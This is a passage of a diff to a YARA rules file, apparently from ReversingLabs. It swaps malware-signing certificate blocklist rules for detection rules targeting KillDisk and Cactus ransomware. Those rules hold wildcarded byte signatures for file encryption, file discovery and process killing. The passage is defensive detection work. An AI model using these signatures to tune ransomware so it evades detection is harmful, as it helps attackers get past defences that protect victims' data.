-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Milsean Software Limited" and ( pe.signatures [ i ] . serial == "00:fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7" or pe.signatures [ i ] . serial == "fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7" ) and 1599523200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( $find_files ) and ( $encrypt_files_v1 ) and ( $cmd_prompt ) and ( $exclude_from_encryption_v1 ) ) or ( ( $find_files ) and ( $cmd_prompt ) and ( $ldap_connect ) and ( $encrypt_files_v2 ) and ( $exclude_from_encryption_v1 ) ) or ( ( $find_files ) and ( $cmd_prompt ) and ( $ldap_connect ) and ( $encrypt_files_v3 ) and ( $exclude_from_encryption_v1 ) ) or ( ( $find_files ) and ( $encrypt_files_v4 ) and ( $drop_ransom_note_v1 ) and ( all of ( $exclude_from_encryption_v2_p* ) ) ) or ( ( $find_files ) and ( $exclude_from_encryption_v1 ) and ( any of ( $encrypt_files_v5 ) ) and ( all of ( $find_system_volumes_v2_p* ) ) ) or ( ( all of ( $encrypt_files_v5_p* ) ) and ( all of ( $set_default_icon_p* ) ) and ( $find_system_volumes ) and ( all of ( $drop_ransom_note_v2_p* ) ) and ( $find_files ) ) or ( ( all of ( $encrypt_files_v6_p* ) ) and ( all of ( $set_default_icon_p* ) ) and ( all of ( $drop_ransom_note_v2_p* ) ) and ( $find_files ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0C14B611A44A1Bae0E8C7581651845B6 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Killdisk : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects KillDisk ransomware."
 		author = "ReversingLabs"
-		id = "116beeac-49c6-56b0-a1c0-855623f604d9"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "bd04ac88-987a-58f0-8f0a-508662b3c930"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5464-L5480"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7f6028181e33e4ba8264ee367169e7259e19ff49dcae9a337a4ba78c06b459e6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.KillDisk.yara#L1-L80"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6148e6fc1363ff8995a9100e07139bfa658c72892db4d30a973bad0f2b3e6c3f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "KillDisk"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 8B AC 24 ?? ?? ??
+            ?? 56 57 33 FF 8B F1 3B F7 89 7D ?? 89 7D ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56
+            FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 95 C0 84 C0 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56 8D
+            4C 24 ?? 89 7C 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? B8 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 8B 5C 24 ?? 3B DF 8B 44 24 ?? 89 45 ?? 89 5D ?? 77 ?? 83 F8 ?? 0F 82
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 56 FF 15
+            ?? ?? ?? ?? 8B E8 3B EF 0F 84 ?? ?? ?? ?? 83 FD ?? 0F 84 ?? ?? ?? ?? 8B 0D ?? ?? ??
+            ?? 33 C0 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89
+            44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 6A ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 54
+            24 ?? 57 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            4C 24 ?? 51 8D 54 24 ?? 89 7C 24 ?? 52 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 0F 84 ?? ?? ?? ?? 8B 74 24 ?? 6A ?? 8B C6 05 ?? ?? ?? ?? 50 8B CB 83 D1 ?? 51
+            6A ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 85 C0 89 44 24 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84
+            ?? ?? ?? ?? 8D 4C 24 ?? 51 53 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 84 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D B4
+            24 ?? ?? ?? ?? 8D 7C 24 ?? 8D 44 24 ?? F3 A5 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 08 89 8C 24 ?? ?? ?? ?? 8B 50 ?? 89 94 24 ?? ?? ?? ?? 8B 48 ?? 89 8C 24
+            ?? ?? ?? ?? 8B 50 ?? 89 94 24 ?? ?? ?? ?? 8B 48 ?? 89 8C 24 ?? ?? ?? ?? 8B 50 ?? 8D
+            74 24 ?? 89 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 6A ?? 53 50 55 FF 15
+            ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 8D 54 24 ?? 52 55 C7 44 24 ?? ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 8B F0 8B 44 24 ?? F7 DE 1B F6 83 E6 ?? 50 83 C6 ?? FF 15 ??
+            ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B C6 EB ?? 8B 44 24 ?? 50 BE ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 55 FF 15 ?? ?? ?? ?? 8B C6 EB ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 EB
+            ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 EB ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8B C6 EB ?? BE ?? ?? ?? ?? 8B C6 EB ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E
+            5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$app_whitelisting_1 = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 32 DB FF 15
+            ?? ?? ?? ?? 6A ?? 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B E8 85 ED 89 6C 24 ?? 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ??
+            51 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 64 24 ??
+            8B 54 24 ?? 3B 54 24 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 33 FF E8 ?? ?? ?? ?? 85 C0
+            0F 86 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B C1
+            2B C3 C1 F8 ?? 3B C7 0F 86 ?? ?? ?? ?? 3B D9 8B F3 76 ?? E8 ?? ?? ?? ?? 8B 1D ?? ??
+            ?? ?? 8B 0D ?? ?? ?? ?? 89 74 24 ?? 8D 34 BE 3B F1 B8 ?? ?? ?? ?? 8B E8 77 ?? 3B F3
+            73 ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 3B 75 ?? 72 ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ??
+            ?? 8B 44 24 ?? 39 06 74 ?? B8 ?? ?? ?? ?? 83 C7 ?? E8 ?? ?? ?? ?? 3B F8 72 ?? 8B 6C
+            24 ?? 8B 74 24 ?? FF 15 ?? ?? ?? ?? 3B F0 74 ?? 85 F6 74 ?? 56 6A ?? 6A ?? FF 15 ??
+            ?? ?? ?? 8B F0 85 F6 74 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? EB ?? 8B
+            6C 24 ?? 8D 4C 24 ?? 51 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B3 ?? 55 FF 15
+            ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 8A C3 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ??
+            ?? ?? C3
+        }
+		$app_whitelisting_2 = {
+            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 56 A1 ?? ?? ?? ?? 33 C4 50 8D 44
+            24 ?? 64 A3 ?? ?? ?? ?? 8D 44 24 ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 70 ?? C7 44
+            24 ?? ?? ?? ?? ?? 56 C7 06 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? 8B 36 EB
+            ?? 33 F6 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7C 24 ?? ?? 72 ?? 8B 4C 24
+            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 64 89 0D
+            ?? ?? ?? ?? 59 5E 83 C4 ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NEEDCODE SP Z O O" and pe.signatures [ i ] . serial == "0c:14:b6:11:a4:4a:1b:ae:0e:8c:75:81:65:18:45:b6" and 1600300801 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $encrypt_files and $app_whitelisting_1 and $app_whitelisting_2
 }
-
-rule REVERSINGLABS_Cert_Blocklist_690910Dc89D7857C3500Fb74Bed2B08D : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Cactus : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Cactus ransomware."
 		author = "ReversingLabs"
-		id = "7c427b1a-fbe9-5e97-9810-87863c70988d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "f391919a-b433-5f8d-8051-f0467118fa1b"
+		date = "2023-12-15"
+		modified = "2023-12-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5482-L5498"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3c5da6238279296854eb95ecaed802f453e80c6bceb71c3fa587df0f7d40cf96"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.Cactus.yara#L1-L190"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2953b67e926cb653df0de208b098da3d5c16e6690842ab28fbf8c37cd16f54d7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Cactus"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 41 57 41 56 41 55 41 54 56 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D AC 24
+            ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ??
+            ?? ?? ?? 48 98 48 89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            89 85 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 4C 8D 4D
+            ?? 4C 8D 45 ?? 48 8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48
+            89 54 24 ?? 48 8B 95 ?? ?? ?? ?? 48 89 54 24 ?? 48 89 CA 48 89 C1 E8 ?? ?? ?? ?? 48
+            8D 45 ?? 48 8B 95 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
+            ?? 48 8B 95 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
+            89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA
+            48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C2
+            48 8D 85 ?? ?? ?? ?? 41 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8B 45 ?? 48 8D
+        }
+		$encrypt_files_p2 = {
+            95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8B 85 ??
+            ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
+            ?? 48 83 C0 ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95
+            ?? ?? ?? ?? 48 8D 4A ?? 41 B8 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
+            ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 29
+            C2 48 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 39 85 ?? ?? ?? ?? 0F 8D ?? ?? ??
+            ?? 48 89 E0 48 89 C6 48 8B 85 ?? ?? ?? ?? 48 8D 50 ?? 48 85 C0 48 0F 48 C2 48 C1 F8
+            ?? 48 C1 E0 ?? 48 89 85 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 8D 43 ?? 48 89 85 ?? ??
+            ?? ?? 48 89 D8 49 89 C4 41 BD ?? ?? ?? ?? 48 89 D8 49 89 C6 41 BF ?? ?? ?? ?? 48 89
+            D8 48 83 C0 ?? 48 C1 E8 ?? 48 C1 E0 ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D 44 24 ?? 48 83
+            C0 ?? 48 89 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ??
+            ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 41 89 D9 4C 8B 85 ?? ?? ?? ?? 48 89 E9 48 8D
+            55 ?? 48 8B 85 ?? ?? ?? ?? 44 89 4C 24 ?? 4D 89 C1 49 89 C8 48 89 C1 E8 ?? ?? ?? ??
+            48 8B 85 ?? ?? ?? ?? F7 D8 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 63 D0 48 8D 85 ??
+            ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48
+            8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 2B 85
+            ?? ?? ?? ?? 48 89 C2 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8
+        }
+		$encrypt_files_p3 = {
+            48 89 DA 48 8B 85 ?? ?? ?? ?? 48 01 D0 48 89 85 ?? ?? ?? ?? 90 48 89 F4 E9 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 48 63 C8 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48
+            89 C1 E8 ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 89 E9 48 8D 55 ?? 48 8B 85 ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? 4D 89 C1 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            F7 D8 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 63 D0 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ??
+            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48 8D 95 ?? ?? ?? ?? 48
+            8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 89 85 ??
+            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 F0 ?? 84
+            C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 48 98 48 8D 55 ?? 48 01 C2 48 89 E9 48 8B 85 ?? ?? ??
+            ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48 8D 95 ?? ?? ??
+            ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8B 45 ?? 48 8D 95 ?? ??
+            ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
+            48 8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 83
+            C0 ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ??
+            ?? 48 8D 4A ?? 41 B8 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89
+         }
+		$encrypt_files_p4 = {
+            C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1
+            E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8
+            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89
+            C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 84 DB 74 ?? 48 8D 45 ?? 48 89 C1 E8
+            ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
+            48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA 48 89 C1 48 8B 05 ?? ?? ?? ??
+            FF D0 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D
+            85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 F4 48 89 C3 EB ?? 48 89 C3 48 8D
+            85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ??
+            ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ??
+            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 8D A5 ?? ??
+            ?? ?? 5B 5E 41 5C 41 5D 41 5E 41 5F 5D C3
+        }
+		$find_files_p1 = {
+            55 56 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ??
+            ?? ?? ?? 48 8D 45 ?? BB ?? ?? ?? ?? 48 89 C6 EB ?? 48 89 F1 E8 ?? ?? ?? ?? 48 83 EB
+            ?? 48 83 C6 ?? 48 85 DB 79 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0
+            0F 95 C0 84 C0 74 ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
+            ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ??
+            84 C0 74 ?? 48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85
+            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
+            ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ??
+            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 84 C0 74 ?? 48 8D 45 ?? 8B 95 ?? ?? ?? ?? 48 63
+            D2 48 C1 E2 ?? 48 01 C2 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1
+            E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
+        }
+		$find_files_p2 = {
+            89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 8B 95 ?? ?? ?? ?? 48 63 D2 48 C1 E2 ?? 48 01 C2 48
+            8D 85 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D
+            85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ??
+            83 85 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? C6 05 ??
+            ?? ?? ?? ?? 48 8D 5D ?? 48 81 C3 ?? ?? ?? ?? 48 8D 45 ?? 48 39 C3 74 ?? 48 83 EB ??
+            48 89 D9 E8 ?? ?? ?? ?? EB ?? 90 E9 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89
+            C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
+            ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89
+            C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C3 48 8D 85 ??
+            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C6 48 8D 5D ?? 48 81 C3 ?? ??
+            ?? ?? 48 8D 45 ?? 48 39 C3 74 ?? 48 83 EB ?? 48 89 D9 E8 ?? ?? ?? ?? EB ?? 90 48 89
+            F0 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? 5B 5E 5D C3
+        }
+		$check_processes = {
+            55 53 48 83 EC ?? 48 8D 6C 24 ?? 48 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? EB ?? 8B 45 ?? 48 98 48 8D 14 C5 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 8B 1C 02 48
+            8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 85
+            C0 0F 95 C0 84 C0 74 ?? B8 ?? ?? ?? ?? EB ?? 83 45 ?? ?? 8B 45 ?? 3B 45 ?? 7C ?? B8
+            ?? ?? ?? ?? 48 83 C4 ?? 5B 5D C3
+        }
+		$kill_file_processes_p1 = {
+            55 56 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? C6 85 ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF C0
+            0F 11 45 ?? F3 0F 6F 4D ?? 0F 11 8D ?? ?? ?? ?? F3 0F 6F 55 ?? 0F 11 95 ?? ?? ?? ??
+            F3 0F 6F 5D ?? 0F 11 9D ?? ?? ?? ?? F3 0F 6F 65 ?? 0F 11 A5 ?? ?? ?? ?? 0F B7 45 ??
+            66 89 85 ?? ?? 00 00 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ??
+            ?? 48 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 41 B9
+            ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 94 C0
+            84 C0 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
